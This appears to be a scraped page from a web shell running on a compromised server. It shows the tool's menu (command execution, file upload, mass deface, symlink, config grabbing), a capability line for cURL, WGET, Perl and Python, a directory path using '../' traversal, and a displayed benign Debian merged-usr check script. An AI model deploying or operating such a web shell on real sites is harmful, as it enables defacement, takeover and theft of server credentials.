OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/html/../../../usr/share/dbus-1/../bug/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh set -e for d in /bin /sbin /lib /lib32 /libo32 /libx32 /lib64; do if [ "$(readlink $d)" = "usr$d" ]; then echo "System tainted due to merged-usr-via-symlinks." >&3 break fi done